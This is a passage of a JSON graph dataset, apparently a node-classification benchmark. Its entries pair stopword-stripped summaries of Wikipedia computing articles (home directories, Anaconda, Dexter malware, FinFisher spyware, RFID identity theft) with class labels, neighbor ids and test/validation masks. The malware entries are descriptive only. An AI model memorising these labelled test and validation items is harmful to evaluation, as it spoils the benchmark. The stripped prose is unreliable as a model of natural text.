    "text": "Home_directory:home directory home directory file system directory multi-user operating system containing files given user system specifics home directory name location defined operating system involved example linux bsd fhs systems use /home/ username windows systems 2000 server 2003 keep home directories folder called documents settings user home directory intended contain user files including text documents music pictures videos etc may also include configuration files preferred settings software used might tailored liking web browser bookmarks favorite desktop wallpaper themes passwords external services accessed via given software etc user install executable software directory available users permission directory home directory organized use sub-directories content user home directory protected file system permissions default accessible authenticated users administrators user granted administrator privileges authority access protected location filesystem including users home directories separating user data system-wide data avoids redundancy makes backups important files relatively simple furthermore trojan horses viruses worms running user name privileges cases able alter files user home directory perhaps files belonging workgroups user part actual system files unix user automatically placed home directory upon login ~user shorthand variable refers user home directory allowing user navigate anywhere else filesystem use unix commands tilde character shorthand command refers particular user home directory unix superuser access directories filesystem hence access home directories users superuser home directory older systems many newer systems located /root linux bsd /var/root mac os x openvms operating system user home directory called root directory equivalent unix/dos/windows/amigaos root directory referred master file directory single-user operating systems simply single directory partition user files individual directory setup per user though users still setup maintain directories inside main working directory manually",
    "neighbors": [
      2432,
      8962,
      10756,
      6797,
      1810,
      10394,
      413,
      2975,
      2597,
      7847,
      7983,
      4528,
      823,
      8631,
      7739,
      5435,
      700,
      3522,
      9027,
      10436,
      10068,
      9946,
      9694,
      2399,
      10977,
      1509,
      10727,
      4074,
      3571,
      9972,
      2041
    ],
    "mask": "Test"
  },
  {
    "node_id": 4299,
    "label": 4,
    "text": "Take-grant_protection_model:take-grant protection model take-grant protection model formal model used field computer security establish disprove safety given computer system follows specific rules shows even though question safety general undecidable specific systems decidable linear time model represents system directed graph vertices either subjects objects edges labeled label indicates rights source edge destination two rights occur every instance model take grant play special role graph rewriting rules describing admissible changes graph total four rules preconditions formula_1 preconditions formula_2 using rules take-grant protection model one reproduce states system change respect distribution rights therefore one show rights leak respect given safety model",
    "neighbors": [
      3360,
      3616,
      8259,
      10968,
      8627,
      3480,
      10170,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 4300,
    "label": 2,
    "text": "WindowProc:windowproc win32 application programming windowproc window procedure user-defined callback function processes messages sent window function specified application registers window class named anything necessarily windowproc window procedure responsible handling messages sent window function prototype windowproc given hwnd handle window message sent umsg identifies actual message wparam lparam parameters whose meaning depends message application identify message take required action hundreds different messages produced result various events taking place system typically application processes small fraction messages order ensure messages processed windows provides default window procedure called defwindowproc provides default processing messages application process application usually calls defwindowproc end windowproc function whatever messages processed passed default procedure",
    "neighbors": [
      11672
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4301,
    "label": 1,
    "text": "Open_Database_License:open database license open database license odbl copyleft share alike license agreement intended allow users freely share modify use database maintaining freedom others odbl published open data commons see also open data part open knowledge international foundation odbl created goal allowing users share data freely without worrying problems relating copyright ownership allows users make free use data database without worrying copyright creators add data use databases license establishes rights users database well correct procedure attributing credit credit due data make changes improvements data thus simplifying sharing comparison data users longer need worry repercussions violations copyright law stolen information using open database license openstreetmap osm project completed move creative commons license odbl september 2012 attempt legal security specific license databases rather creative works projects using odbl include opencorporates open food facts paris opendata",
    "neighbors": [
      385,
      546,
      4011,
      2864,
      2901
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4302,
    "label": 2,
    "text": "Anaconda_(Python_distribution):anaconda python distribution anaconda free open-source distribution python r programming languages scientific computing data science machine learning applications large-scale data processing predictive analytics etc aims simplify package management deployment package versions managed package management system conda anaconda distribution used 15 million users includes 1500 popular data-science packages suitable windows linux macos anaconda distribution comes 1,500 packages well conda package virtual environment manager also includes gui anaconda navigator graphical alternative command line interface cli big difference conda pip package manager package dependencies managed significant challenge python data science reason conda exists pip installs python package dependencies required whether conflict packages installed previously working installation example google tensorflow suddenly stop working pip install different package needs different version numpy library insidiously everything might still appear work get different results data science unable reproduce results elsewhere n't pip install order conda analyzes current environment everything installed version limitations specify e.g want tensorflow 2.0 figures install compatible dependencies tell want ca n't done pip contrast install thing wanted dependencies even breaks things open source packages individually installed anaconda repository anaconda cloud anaconda.org private repository mirror using codice_1 command anaconda inc compiles builds packages anaconda repository provides binaries windows 32/64 bit linux 64 bit macos 64-bit also install anything pypi conda environment using pip conda knows installed pip installed custom packages made using codice_2 command shared others uploading anaconda cloud pypi repositories default installation anaconda2 includes python 2.7 anaconda3 includes python 3.7 however create new environments include version python packaged conda anaconda navigator desktop graphical user interface gui included anaconda distribution allows users launch applications manage conda packages environments channels without using command-line commands navigator search packages anaconda cloud local anaconda repository install environment run packages update available windows macos linux following applications available default navigator conda open source cross-platform language-agnostic package manager environment management system installs runs updates packages dependencies created python programs package distribute software language e.g. r including multi-language projects conda package environment manager included versions anaconda miniconda anaconda repository anaconda cloud package management service anaconda find access store share public private notebooks environments conda pypi packages cloud hosts useful python packages notebooks environments wide variety applications need log cloud account search public packages download install build new packages using anaconda client command line interface cli manually automatically upload packages cloud",
    "neighbors": [
      5130,
      9487,
      788,
      1813,
      8213,
      10900,
      8476,
      4775,
      6828,
      7983,
      823,
      5819,
      190,
      8262,
      9671,
      5833,
      5067,
      3918,
      463,
      3667,
      6361,
      2010,
      2401,
      4961,
      1379,
      741,
      231,
      6119,
      9063,
      8554,
      9320,
      5612,
      7293
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4303,
    "label": 4,
    "text": "Rainbow_Series:rainbow series rainbow series sometimes known rainbow books series computer security standards guidelines published united states government 1980s 1990s originally published u.s. department defense computer security center national computer security center standards describe process evaluation trusted systems cases u.s. government entities well private firms would require formal validation computer technology using process part procurement criteria many standards influenced superseded common criteria books nicknames based color cover example trusted computer system evaluation criteria referred orange book book entitled applied cryptography security expert bruce schneier states ncsc-tg-021 ca n't even begin describe color cover books series hideously colored covers goes describe receive copy saying n't tell sent",
    "neighbors": [
      6494,
      6593,
      1315,
      4067,
      10055,
      8904,
      8302,
      7887,
      3924,
      310,
      10170,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 4304,
    "label": 4,
    "text": "Dexter_(malware):dexter malware dexter computer virus point sale malware infects computers running microsoft windows discovered security firm seculert december 2012 infects pos systems worldwide steals sensitive information credit card debit card information december 2013 researchers discovered stardust major revision dexter compromised 20,000 cards active campaign hitting us merchants one first known botnets target point-of-sale pos terminals used stores restaurants process customers credit debit card payments",
    "neighbors": [
      1024,
      5636,
      4117,
      8726,
      535,
      9761,
      4644,
      4133,
      3116,
      7739,
      10309,
      1608,
      3657,
      8779,
      4703,
      8288,
      8292,
      10875,
      3711,
      8320,
      5764,
      2187,
      4240,
      1688,
      2717,
      9375,
      9904,
      9395,
      8886,
      3789,
      6360,
      4314,
      9435,
      4830,
      3807,
      5349,
      1254,
      10477,
      9460,
      7418,
      2815,
      3843,
      10502,
      10003,
      297,
      2857,
      8489,
      11052,
      9518,
      1337,
      6484,
      857,
      1882,
      7515,
      3956,
      9082,
      11152,
      10132,
      1440,
      5024,
      5028,
      11175,
      5547,
      7601,
      1970,
      441,
      1979,
      4027,
      9664,
      8133,
      6091,
      4054,
      7639,
      8664,
      1504,
      9186,
      2542,
      507
    ],
    "mask": "Test"
  },
  {
    "node_id": 4305,
    "label": 2,
    "text": "Series_30+:series 30+ series 30+ abbreviated s30+ software platform application user interface used nokia-branded mobile devices platform introduced nokia september 2013 first appearing nokia 108 main nokia feature phone operating system end series 30 series 40 platforms 2014 despite similar name user interface s30+ technically completely different unrelated s30 many s30+ devices support maui runtime environment mre developed mediatek later devices included support j2me applications even models n't support java j2me applications still capable running built-in online applications opera mini browser bing search msn weather skype groupme chat s30+ models also come online shop would allow downloading new apps games platform taken nokia microsoft mobile 2014 hmd global 2016 although devices still selling brand nokia following feature phones use series 30+ platform available single dual sim models maximum accepted video resolution 854×480",
    "neighbors": [
      1537,
      10754,
      11271,
      529,
      3089,
      10770,
      5143,
      2072,
      5659,
      10273,
      4132,
      40,
      3626,
      8237,
      9262,
      7727,
      10802,
      7220,
      5175,
      9784,
      1083,
      9292,
      7246,
      1615,
      5201,
      7253,
      3162,
      5211,
      6748,
      607,
      1633,
      2658,
      10855,
      6763,
      109,
      1148,
      8316,
      8829,
      11391,
      6787,
      6276,
      3205,
      6797,
      9359,
      1687,
      10393,
      5274,
      669,
      6301,
      673,
      6310,
      167,
      5290,
      10410,
      7857,
      7866,
      1728,
      5824,
      4291,
      7877,
      199,
      4305,
      2259,
      6870,
      9443,
      3300,
      4324,
      7399,
      8423,
      8433,
      5369,
      8976,
      8472,
      11545,
      5406,
      4383,
      7983,
      821,
      7991,
      321,
      7492,
      10053,
      11079,
      9033,
      2380,
      6996,
      854,
      10583,
      10080,
      10599,
      6505,
      6508,
      2925,
      5998,
      8576,
      8577,
      11655,
      3978,
      1424,
      2449,
      8083,
      3477,
      7063,
      5019,
      8098,
      4003,
      7617,
      9155,
      967,
      9166,
      2001,
      5600,
      10215,
      3561,
      9194,
      495,
      1524,
      1533
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4306,
    "label": 3,
    "text": "IBM_ThinkPad_310:ibm thinkpad 310 ibm thinkpad 310 notebook computer manufactured 1997 ibm corporation part thinkpad laptop 300 series models shipped windows 95 capable running windows 3.1 later versions windows far recent windows xp provided sufficient ram driver upgrades run properly well several linux variations features hardware varied model three models 310 lineup featured cd-rom standard none featured internal floppy drive bay capable housing floppy drive models feature port back allowed connection external floppy drive could boot models featured intel pentium processor running 166 mhz graphics hardware chips technologies 65550 pci system approximately 1 mb video memory dstn display capable 800x600 resolution models also featured 2 type ii cardbus slots models came either 16mb 32mb edo ram",
    "neighbors": [
      3304,
      780,
      6797,
      8851,
      823,
      3323
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4307,
    "label": 4,
    "text": "Arpwatch:arpwatch arpwatch computer software tool monitoring address resolution protocol traffic computer network generates log observed pairing ip addresses mac addresses along timestamp pairing appeared network also option sending email administrator pairing changes added network administrators monitor arp activity detect arp spoofing network flip-flops changed new stations address reuse arpwatch developed lawrence berkeley national laboratory network research group open-source software released bsd license",
    "neighbors": [
      5612,
      6013,
      7983,
      2045,
      4085,
      6295,
      5437,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 4308,
    "label": 3,
    "text": "Software_lockout:software lockout multiprocessor computer systems software lockout issue performance degradation due idle wait times spent cpus kernel-level critical sections software lockout major cause scalability degradation multiprocessor system posing limit maximum useful number processors mitigate phenomenon kernel must designed critical sections short possible therefore decomposing data structure smaller substructures multiprocessor systems processor schedules controls therefore supervisor processor kernel data structures globally shared sections code access shared data structures critical sections design choice made improve scaling reliability modularity examples kernel data structure ready list communication channels conflict happens one processor trying access resource memory portion time prevent critical races inconsistency one processor cpu given time allowed access particular data structure memory portion cpus trying access time locked-out waiting idle status three cases distinguished idle wait either necessary convenient convenient idle wait necessary access ready list low level scheduling operation idle wait necessary convenient case critical section synchronization/ipc operations require less time context switch executing another process avoid idle wait idle wait instead convenient case kernel critical section device management present monolithic kernels microkernel instead falls first two cases multiprocessor system conflicts kernel-level conflicts due access kernel level critical sections thus idle wait periods generated major impact performance degradation idle wait time increases average number idle processors thus decreases scalability relative efficiency taking parameters average time interval spent processor kernel level critical sections l time locked state average time interval spent processor tasks outside critical sections e ratio l/e crucial evaluating software lockout typical values l/e range 0.01 0.1 system l/e ratio 0.05 instance 15 cpus expected average 1 cpu always idle 21 cpus 2.8 idle 40 cpus 19 idle 41 cpus 20 idle therefore adding 40 cpus system would useless general l/e value threshold maximum number useful cpus reduce performance degradation software lockout reasonable levels l/e 0.05 0.1 kernel and/or operating system must designed accordingly conceptually valid solution decompose kernel data structure smaller independent substructures shorter elaboration time allows one cpu access original data structure many uniprocessor systems hierarchical protection domains estimated spend 50 time performing supervisor mode operations systems adapted multiprocessing setting lock access supervisor state l/e would easily greater 1 resulting system throughput uniprocessor despite number cpus",
    "neighbors": [
      785,
      7313,
      7187,
      7699,
      7446,
      7963,
      6815,
      2210,
      5798,
      9126,
      6184,
      2345,
      4909,
      7218,
      10675,
      8501,
      7483,
      5948,
      4286,
      2113,
      8514,
      5956,
      709,
      3398,
      4423,
      1480,
      6909,
      330,
      1866,
      7497,
      8523,
      2008,
      344,
      2394,
      731,
      2140,
      2264,
      11487,
      4194,
      5090,
      11618,
      7142,
      5223,
      2536,
      8810,
      4205,
      6774,
      7802,
      508,
      3197,
      8447
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4309,
    "label": 2,
    "text": "Installation_(computer_programs):installation computer programs installation setup computer program including device drivers plugins act making program ready execution installation refers particular configuration software hardware view making use able computer soft digital copy piece software program needed install different processes installing piece software program process varies program computer programs including operating systems often come installer specialized program responsible whatever needed see installation installation may part larger software deployment process installation typically involves code program copied/generated installation files new files local computer easier access operating system creating necessary directories registering environment variables providing separate program un-installation etc.. code generally copied/generated multiple locations uninstallation usually involves erasing program folder example registry files system code may need modified deleted complete uninstallation computer programs executed simply copying folder stored computer executing programs supplied form unsuitable immediate execution therefore need installation procedure installed program executed without need reinstall execution common operations performed software installations include operations may require charges free charge case payment installation costs means costs connected relevant incurred result installing drivers equipment customers premises installers may attempt trick users installing junkware various forms adware toolbars trialware software partnering companies prevent extra caution exactly asked installed needed installation additional software simply skipped unchecked may require user use custom detailed expert version installation procedure .such malicious conduct necessarily decision software developers company also issue external installers download.com installer cnet mentioned earlier computer programs need installation usual many programs run dos mac os atari tos amigaos computing environments grew complex fixed hard drives replaced floppy disks need tangible installation presented example commodore released installer amiga class modern applications need installation known portable applications may roamed around onto different computers run similarly live operating systems need installation run directly bootable cd dvd usb flash drive loaded network thin clients examples amigaos 4.0 various linux distributions morphos mac os versions 1.0 9.0 see live cd live usb finally web applications run inside web browser need installation windows systems common form installation installation process usually needs user attends make choices accepting declining end-user license agreement eula specifying preferences installation location supplying passwords assisting product activation graphical environments installers offer wizard-based interface common attended installers may ask users help mitigate errors instance disk computer program installed full installer may ask user specify another target path clear enough space disk common misconception unarchivation considered installation action include user choices accepting declining eula installation display messages windows progress silent installation unattended installation see silent installations unattended unattended installations silent reason behind silent installation may convenience subterfuge malware almost always installed silently installation performed without user interaction progress user present one reasons use approach automate installation large number systems unattended installation either require user supply anything received necessary input prior start installation input may form command line switches answer file file contains necessary parameters windows xp linux distributions examples operating systems installed answer file unattended installation assumed user help mitigate errors instance installation medium faulty installer fail installation user fix fault replace medium unattended installers may record errors computer log later review installation performed without using computer monitor connected attended forms headless installation another machine connects target machine instance via local area network takes display output since headless installation need user location target computer unattended headless installers may used install program multiple machines time installation process runs preset time predefined condition transpires opposed installation process starts explicitly user command instance system administrator willing install later version computer program used schedule installation occur program running operating system may automatically install device driver device user connects see plug play malware may also installed automatically example infamous conficker installed user plugged infected device computer clean installation one done absence interfering elements old versions computer program installed leftovers previous installation particular clean installation operating system installation target disk partition erased installation since interfering elements absent clean installation may succeed unclean installation may fail may take significantly longer network installation shortened netinstall installation program shared network resource may done installing minimal system proceeding download packages network may simply copy original media software publishers offer site licenses institutional customers may provide version intended installation network installation program installer computer program installs files applications drivers software onto computer installers specifically made install files contain installers general-purpose work reading contents software package installed differences package management system installer installation computer programs sometimes necessary update installer package manager make possible technique called bootstrapping used common pattern use small executable files update installer starts real installation update small executable called bootstrapper sometimes bootstrapper installs prerequisites software bootstrapping process cross-platform installer builders produce installers run windows macos linux example installanywhere flexera software windows nt family includes installation api associated service called windows installer microsoft provides minimum level tools required create installers using windows installer freely available windows sdk instead focusing api allow developers third parties leverage creating custom installers third party tools may supporting create installers using api speed process examples include installshield flexera software wix outercurve foundation installation authoring tools rely windows installer include wise installation studio wise solutions inc. installer vise mindvision software visual installer samlogic nsis clickteam innosetup installsimple macos includes installer native package manager macos also includes separate software updating application software update supports apple system software included dock 10.6.6 mac app store shares many attributes successful app store ios devices similar app approval process use apple id purchases automatic installation updating although apple preferred delivery method macos previously purchased licenses transferred mac app store downloading automatic updating commercial applications macos may also use third-party installer mac version installer vise mindvision software installermaker stuffit system installer software used set install operating system onto device examples system installers linux ubiquity wubi ubuntu anaconda centos fedora debian-installer debian-based versions linux yast suse-based projects another example found haiku operating system uses utility called haiku installer install onto device booting live cd live usb",
    "neighbors": [
      2432,
      11521,
      516,
      2310,
      8710,
      8976,
      8466,
      1555,
      4755,
      3735,
      6679,
      6680,
      9112,
      8347,
      4637,
      11680,
      5155,
      5923,
      6566,
      7847,
      6697,
      811,
      7983,
      304,
      9140,
      6837,
      2486,
      823,
      440,
      4279,
      1083,
      5819,
      10172,
      10817,
      1992,
      5067,
      6731,
      4174,
      463,
      722,
      2386,
      3667,
      10197,
      6615,
      3163,
      7515,
      5343,
      2401,
      4961,
      3555,
      231,
      9063,
      4841,
      106,
      11370,
      877,
      3822,
      7934,
      9197,
      6257,
      1138,
      2290,
      4858,
      6012,
      1150
    ],
    "mask": "Test"
  },
  {
    "node_id": 4310,
    "label": 5,
    "text": "OmniWeb:omniweb omniweb proprietary internet web browser developed marketed omni group exclusively apple macos operating system though longer maintained still available free download omniweb originally developed omni group nextstep platform released lighthouse design march 17 1995 one month development time nextstep evolved openstep mac os x omniweb updated run platforms omniweb also able run microsoft windows yellow box openstep frameworks lighthouse design bought sun microsystems omni group released product version 2.5 onwards version 4.0 onwards omniweb developed solely os x platform omniweb developed using cocoa api allowed take full advantage os x features used quartz render images smooth text use multiple processors available featured interface made use aqua ui features drawers sheets customizable toolbars omniweb originally employed proprietary html layout engine used standard api nstext components however engine slow particularly scrolling fully compatible recent web standards cascading style sheets omniweb version 4.5 omni group adopted apple khtml-based webcore rendering engine created apple safari browser august 11 2004 omni group released version 5.0 omniweb included number new features notable feature unusual implementation tabbed browsing tabs displayed vertically drawer side window including optional thumbnail pictures pages despite certain amount controversy merits tab drawer tab toolbar feature persisted final version september 7 2006 version 5.5 released major new features included use custom version webkit instead webcore universal binary support saving web archive support user-defined style sheets select next link feature ftp folder display ad-blocking improvements updated localizations many small changes bug fixes omniweb omni group flagship app os x web browsers improved—apple eventually bundled safari os x— omni successfully introduced products omnigraffle omnioutliner omniweb importance diminished omniweb price successively lowered first 39.95 february 24 2009 omni group announced omniweb would made available free change previous price 14.95 omni group official website states browser longer active development omniweb popular early 2000s omnigroup experience developing openstep became foundation mac os x gave edge developers apple safari omniweb best support mac os x technologies among competition chiefly mozilla firefox internet explorer mac john siracusa technology journalist critic writing ars technica said finding level functionality proper mac os x application respected developer proven track record like finding perfect 1/10,000th scale replica eiffel tower box crackerjacks tower transforms tiny robot makes lunch",
    "neighbors": [
      513,
      6657,
      9736,
      2579,
      6171,
      2076,
      9757,
      7713,
      3110,
      10791,
      9770,
      559,
      4661,
      3639,
      10808,
      3643,
      9275,
      64,
      5707,
      10834,
      5205,
      6231,
      8281,
      2139,
      6747,
      6237,
      2149,
      1642,
      9834,
      8303,
      9841,
      115,
      2676,
      9843,
      3191,
      119,
      4728,
      124,
      637,
      1664,
      2182,
      7307,
      6797,
      11418,
      10910,
      8351,
      7340,
      9394,
      9908,
      185,
      11449,
      4797,
      7364,
      11466,
      7885,
      11469,
      9424,
      2777,
      8923,
      737,
      4326,
      4331,
      4844,
      9451,
      11000,
      8443,
      9987,
      7943,
      1807,
      278,
      3350,
      7965,
      1834,
      7983,
      7488,
      10057,
      11082,
      10060,
      2893,
      3407,
      11112,
      8557,
      3956,
      3961,
      6528,
      3971,
      3462,
      8584,
      4490,
      6028,
      10126,
      7572,
      5536,
      5026,
      4013,
      944,
      5054,
      10174,
      9665,
      6086,
      4048,
      5078,
      479,
      10722,
      5605,
      487,
      8169,
      494,
      1520,
      7152,
      6133,
      5622,
      5114
    ],
    "mask": "Test"
  },
  {
    "node_id": 4311,
    "label": 2,
    "text": "Pac-Man_Championship_Edition:pac-man championship edition game designed tōru iwatani creator original 1980 arcade game pac-man iwatani final game retirement originally released xbox live arcade service xbox 360 later released android ios j2me roku maemo 5 s60 platforms playstation network playstation portable playstation 3 consoles nintendo 3ds part retail game pac-man galaga dimensions part downloadable game compilation pac-man museum xbox 360 playstation 3 steam pc pac-man championship edition received two successors—an indirect follow-up pac-man championship edition dx released 2010 featuring new gameplay elements—and direct sequel pac-man championship edition 2 released playstation 4 xbox one pc 2016 like original pac-man basic game play pac-man championship edition consists entirely navigating pac-man maze eating dots power pellets bonus items fruits keys objects avoiding four ghosts roam maze well pac-man caught ghost player loses life eating power pellet causes ghosts turn blue allowing pac-man eat send back home re-emerge original form however several major differences original counterpart making pac-man c.e faster paced game maze divided two halves eating dots one half causes bonus item appear side eating item causes new maze appear half players also collect additional power pellets increase powered time continue earning maximum points eating ghosts longer player stays alive faster game gets points earned opposed levels game played within certain time limit players attempting get highest score possible game features six modes championship basic five-minute mode two challenge modes affect stage increasing power pellet pickups putting maze darkness three extra modes featuring different mazes game also supports online leader boards game originally released xbox live arcade service june 6 2007 announcement game spurred purchases xbox 360 japan pac-man c.e also available disc titled xbox live arcade compilation bundled xbox 360 arcade console bundle well compilation package namco museum virtual arcade latter however ca n't accessed within nmva must accessed game library ports ios j2me android psp minis released december 10 2009 middle 2009 late 2010 december 1 2010 respectively follow-up pac-man championship edition dx released xbox live arcade november 17 2010 playstation network november 23 2010 original pac-man championship edition ported nintendo 3ds part retail game titled pac-man galaga dimensions 2011 included downloadable game titled pac-man museum 2014 june 5 2007 first pac-man world championship held new york city brought together ten competitors eight countries play new pac-man championship edition prior release xbox live arcade top two scorers robert glashuettner austria carlos daniel borrego romero mexico competed championship single five-minute round borrego named pac-man world champion xbox 360 console specially decorated pac-man artwork signed tōru iwatani participants pac-man championship edition received mostly positive reviews critics reviewers stating gameplay fresh exciting one best 'exclusive pieces downloadable/casual entertainment available nice see classic remade instead simply repackaged jared rea joystiq called first true sequel pac-man since ms pac-man criticisms include lack multiplayer mode apparent relapse patterns original game metacritic aggregator score 83 user average 8.5/10 ios port criticised microtransaction strategy android port criticised poor controls ign criticised pspminis version due absence online leaderboards inferiority sequel",
    "neighbors": [
      8199,
      3561,
      8937,
      7246,
      4856,
      3039
    ],
    "mask": "Test"
  },
  {
    "node_id": 4312,
    "label": 3,
    "text": "Congo_Bongo:congo bongo also known isometric platform arcade game released sega 1983 player takes role red-nosed safari hunter tries catch ape named bongo hunter seeks bongo exact revenge apparent practical joke bongo set fire hunter tent giving literal hot foot game named peter w. gorrie cfo sega time game rom contains message indicating likely coded least part company ikegami tsushinki congo bongo gameplay similar donkey kong frogger levels viewed isometric perspective oblique perspective ports protagonist offensive abilities must move jump avoid enemies obstacles complete level first level player must avoid coconuts thrown bongo climb series cliffs reach time shaking monkeys try throw hunter mountain second player crosses swamp riding backs swimming hippopotamuses dodging snakes scorpions third level requires player cross plain duck holes avoid charging rhinoceroses fourth involves second swamp crossing lily pads fish hippos player completes four levels hunter gives sleeping bongo hot foot retaliation prank bongo played game begins increased difficulty despite commercial failure initially released congo bongo ported nearly every major gaming platform day including sg-1000 msx intellivision colecovision commodore 64 twice first cartridge later disk ibm pc atari 2600 atari 5200 atari 8-bit family texas instruments ti-99/4a sega ports atari 2600 5200 8-bits commodore 64 cartridge version featured two four levels arcade original colecovision release missing level snake lake intellivision port features 4 game original levels ahoy 1984 stated congo bongo commodore 64 vic-20 fraught problems gameplay repetitive frustrating tedious inconsistent times confusing music got nerves stomped plus whole thing derivative 1984 st. game readers named game worst atari program 1983 even worse notorious e.t extra-terrestrial emulated version original arcade release featured unlockable playstation portable version sega genesis collection sega mega drive collection pal regions version also featured sonic ultimate genesis collection sega mega drive ultimate collection pal regions xbox 360 playstation 3 enhanced remake released playstation 2 sega ages label part sega ages 2500 series vol 23 sega memorial selection",
    "neighbors": [
      8937,
      10316,
      9006,
      10576,
      10931,
      10644,
      8151
    ],
    "mask": "Test"
  },
  {
    "node_id": 4313,
    "label": 4,
    "text": "Wireless_identity_theft:wireless identity theft wireless identity theft also known contactless identity theft rfid identity theft form identity theft described act compromising individual ’ personal identifying information using wireless radio frequency mechanics numerous articles written wireless identity theft broadcast television produced several investigations phenomenon according marc rotenberg electronic privacy information center wireless identity theft pretty serious issue contactless wireless card design inherently flawed wireless identity theft relatively new technique gathering individual ’ personal information rf-enabled cards carried person access control credit debit government issued identification cards cards carry radio frequency identification chip responds certain radio frequencies tags come contact radio waves respond slightly altered signal response contain encoded personal identifying information including card holder ’ name address social security number phone number pertinent account employee information upon capturing ‘ harvesting ’ data one able program cards respond identical fashion ‘ cloning ’ many websites dedicated teaching people well supplying necessary equipment software financial industrial complex migrating use magnetic stripes debit credit cards technically require swipe magnetic card swipe reader number transactions per minute increased transactions processed shorter time therefore making arguably shorter lines cashier academic researchers ‘ white-hat ’ hackers analysed documented covert theft rfid credit card information met denials criticisms rfid card-issuing agencies nevertheless public disclosure information could stolen low-cost jerry-rigged detectors used scan cards mailing envelopes studies also even via drive-by data attacks design security features various cards upgraded remove card owners ’ names data additionally number completely unencrypted card designs converted encrypted data systems issues raised 2006 report importance due tens millions cards already issued credit debit card data could stolen via special low cost radio scanners without cards physically touched removed owner ’ pocket purse carry bag among findings 2006 research study vulnerabilities first-generation rfid-enabled credit cards reports white-hat hackers related issue privacy groups individuals also raised big brother concerns threat individuals aggregated information even tracking movements either card issuing agencies third party entities even governments industry observers stated ‘ ... rfid certainly potential invasive consumer technology ever ’ credit card issuing agencies issued denial statements regarding wireless identity theft fraud provided marketing information either directly criticized implied release study results credit card companies contacted new york times investigative report said removing card holder names data transmitted new second generation rfid cards certain official identification documents issued u.s. government u.s passports passport cards also enhanced driver ’ licenses issued states new york washington contain rfid chips purpose assisting policing u.s. border various security issues identified use including ability black hats harvest identifier numbers distance apply blank counterfeit documents cards thus assuming people ’ identifiers various issues potential issues use identified including privacy concerns although rfid identifier number associated document supposed include personal identification information ... numbers evolve time uses evolve time eventually things reveal information initially expect stated tadayoshi kohno assistant professor computer science university washington participated study government issued documents",
    "neighbors": [
      2737,
      1381,
      10685,
      8839
    ],
    "mask": "Test"
  },
  {
    "node_id": 4314,
    "label": 4,
    "text": "FinFisher:finfisher finfisher also known finspy surveillance software marketed lench solutions plc markets spyware law enforcement channels finfisher covertly installed targets computers exploiting security lapses update procedures non-suspect software company criticized human rights organizations selling capabilities repressive non-democratic states known monitoring imprisoning political dissidents egyptian dissidents ransacked offices egypt secret police following overthrow egyptian president hosni mubarak reported discovered contract gamma international €287,000 license run finfisher software 2014 american citizen sued ethiopian government surreptitiously installing finspy onto computer america using wiretap private skype calls monitor entire family ’ every use computer period months lench solutions plc uk-based branch gamma international ltd andover england germany-based branch gamma international gmbh munich gamma international subsidiary gamma group specializing surveillance monitoring including equipment software training services reportedly owned william louthean nelson shell corporation british virgin islands shell corporation signed nominee director order withhold identity ultimate beneficiary nelson common system companies established offshore august 6 2014 finfisher source code pricing support history related data retrieved gamma international internal network made available internet addition spyware finfisher suite offered gamma intelligence community includes monitoring ongoing developments updating solutions techniques complement developed intelligence agencies software suite company calls remote monitoring deployment solutions ability take control target computers capture even encrypted data communications using enhanced remote deployment methods install software target computers intrusion training program offered includes training methods techniques use company-supplied software suite marketed arabic english german french portuguese russian offered worldwide trade shows offering intelligence support system iss training products law enforcement intelligence agencies finfisher malware installed various ways including fake software updates emails fake attachments security flaws popular software sometimes surveillance suite installed target accepts installation fake update commonly used software code install malware also detected emails software designed evade detection antivirus software versions work mobile phones major brands security flaw apple itunes allowed unauthorized third parties use itunes online update procedures install unauthorized programs gamma international offered presentations government security officials security software trade shows described covertly install finfisher spy software suspects computers using itunes update procedures security flaw itunes finfisher reported exploited first described 2008 security software commentator brian krebs apple patch security flaw three years november 2011 apple officials offered explanation flaw took long patch promotional videos used firm trade shows illustrate infect computer surveillance suite released wikileaks december 2011 2014 ethiopian government found installed finspy computer american citizen via fake email attachment appeared microsoft word document finfisher also found engage politically motivated targeting ethiopia instance photos political opposition group used bait infect users technical analysis malware methods infection persistence techniques published code security blog four parts 12 march 2013 reporters without borders named gamma international one five corporate enemies internet “ digital era mercenaries ” selling products used governments violate human rights freedom information finfisher technology used bahrain reporters without borders together privacy international european center constitutional human rights ecchr bahrain centre human rights bahrain watch filed organisation economic co-operation development oecd complaint asking national contact point united kingdom investigate gamma ’ possible involvement bahrain since research shown finfisher technology used australia austria bahrain bangladesh britain brunei bulgaria canada czech republic estonia ethiopia germany hungary india indonesia japan latvia lithuania macedonia malaysia mexico mongolia netherlands nigeria pakistan panama qatar romania serbia singapore south africa turkey turkmenistan united arab emirates united states venezuela vietnam finfisher capable masquerading legitimate programs mozilla firefox april 30 2013 mozilla announced sent gamma cease-and-desist letter trademark infringement gamma created espionage program entitled firefox.exe even provided version number trademark claims appear legitimate firefox software article pc magazine bill marczak member bahrain watch computer science phd student university california berkeley research finfisher said finspy mobile gamma mobile spyware saw respect desktop version finfisher antivirus alone n't enough bypassed antivirus scans article author sara yin analyst pc magazine predicted antivirus providers likely updated signatures detect finspy mobile according announcements eset finfisher finspy detected eset antivirus software win32/belesak.d trojan security vendors claim products block spyware know detect regardless may launched eugene kaspersky head security company kaspersky lab stated detect malware regardless purpose origin two years statement eugene kaspersky 2012 description technique used finfisher evade kaspersky protection published part 2 relevant blog code security",
    "neighbors": [
      1024,
      3072,
      5636,
      10245,
      10756,
      9233,
      3092,
      4117,
      8726,
      535,
      9761,
      4644,
      4133,
      9256,
      3643,
      7739,
      9791,
      1088,
      4165,
      1608,
      3657,
      2634,
      8779,
      4703,
      8288,
      8292,
      8805,
      107,
      3192,
      10875,
      5245,
      3711,
      8320,
      7809,
      6786,
      131,
      5764,
      2187,
      9356,
      8333,
      4240,
      1688,
      10392,
      1690,
      2717,
      9375,
      5281,
      2213,
      9904,
      9395,
      8886,
      3789,
      4304,
      9435,
      4830,
      3807,
      5349,
      1254,
      10477,
      9460,
      3320,
      4344,
      7418,
      4863,
      2815,
      1279,
      3843,
      10502,
      8978,
      4883,
      10003,
      278,
      3867,
      8998,
      297,
      2857,
      8489,
      11052,
      9518,
      1337,
      3395,
      6484,
      857,
      1882,
